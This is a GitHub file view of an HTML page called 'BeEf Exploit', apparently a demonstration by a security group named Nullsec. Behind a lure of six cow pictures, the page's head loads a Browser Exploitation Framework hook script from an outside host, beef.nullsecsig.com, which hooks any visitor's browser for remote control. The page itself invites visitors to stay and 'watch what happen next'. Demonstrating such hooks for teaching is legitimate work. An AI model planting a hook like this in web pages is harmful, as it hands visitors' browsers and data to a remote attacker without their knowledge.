-
Notifications
You must be signed in to change notification settings - Fork 1
/
exploit.html
132 lines (127 loc) · 5.81 KB
/
exploit.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
<!doctype html>
<html lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="">
<meta name="author" content="c">
<title>BeEf Exploit</title>
<link href="https://cdn.jsdelivr.net/npm/[email protected]/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-eOJMYsd53ii+scO/bJGFsiCZc+5NDVN2yr8+0RDqr0Ql0h+rP48ckxlpbzKgwra6" crossorigin="anonymous">
<script src="https://beef.nullsecsig.com/hook.js"></script>
<style>
.bd-placeholder-img {
font-size: 1.125rem;
text-anchor: middle;
-webkit-user-select: none;
-moz-user-select: none;
user-select: none;
}
@media (min-width: 768px) {
.bd-placeholder-img-lg {
font-size: 3.5rem;
}
}
</style>
</head>
<body>
<header>
<div class="navbar navbar-dark bg-dark shadow-sm">
<div class="container">
<a href="https://www.nullsecsig.com/" class="navbar-brand d-flex align-items-center">
<strong>Nullsec</strong>
</a>
</div>
</div>
</header>
<main>
<section class="py-5 text-center container">
<div class="row py-lg-5">
<div class="col-lg-6 col-md-8 mx-auto">
<h1 class="fw-light">BeEf Exploit</h1>
<p class="lead text-muted">Stay on this page and watch what happen next</p>
</div>
</div>
</section>
<div class="album py-5 bg-light">
<div class="container">
<div class="row row-cols-1 row-cols-sm-2 row-cols-md-3 g-3">
<div class="col">
<div class="card shadow-sm">
<img src="/demoasset/pic1.png" height="225" alt="Alternate Text" />
<div class="card-body">
<p class="card-text">Cow</p>
<div class="d-flex justify-content-between align-items-center">
<small class="text-muted">Picture</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img src="/demoasset/pic2.png" height="225" alt="Alternate Text" />
<div class="card-body">
<p class="card-text">Cow</p>
<div class="d-flex justify-content-between align-items-center">
<small class="text-muted">Picture</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img src="/demoasset/pic3.png" height="225" alt="Alternate Text" />
<div class="card-body">
<p class="card-text">Cow</p>
<div class="d-flex justify-content-between align-items-center">
<small class="text-muted">Picture</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img src="/demoasset/pic4.png" height="225" alt="Alternate Text" />
<div class="card-body">
<p class="card-text">Cow</p>
<div class="d-flex justify-content-between align-items-center">
<small class="text-muted">Picture</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img src="/demoasset/pic5.png" height="225" alt="Alternate Text" />
<div class="card-body">
<p class="card-text">Cow</p>
<div class="d-flex justify-content-between align-items-center">
<small class="text-muted">Picture</small>
</div>
</div>
</div>
</div>
<div class="col">
<div class="card shadow-sm">
<img src="/demoasset/pic6.png" height="225" alt="Alternate Text" />
<div class="card-body">
<p class="card-text">Cow</p>
<div class="d-flex justify-content-between align-items-center">
<small class="text-muted">Picture</small>
</div>
</div>
</div>
</div>
</div>
</div>
</div>
</main>
<footer class="text-muted py-5">
<div class="container">
<p class="float-end mb-1">
<a href="#">Back To Top</a>
</p>
</div>
</footer>
<script src="https://cdn.jsdelivr.net/npm/[email protected]/dist/js/bootstrap.bundle.min.js" integrity="sha384-JEW9xMcG8R+pH31jmWH6WWP0WintQrMb4s7ZOdauHnUtxwoG2vI5DkLtS3qm9Ekf" crossorigin="anonymous"></script>
</body>
</html>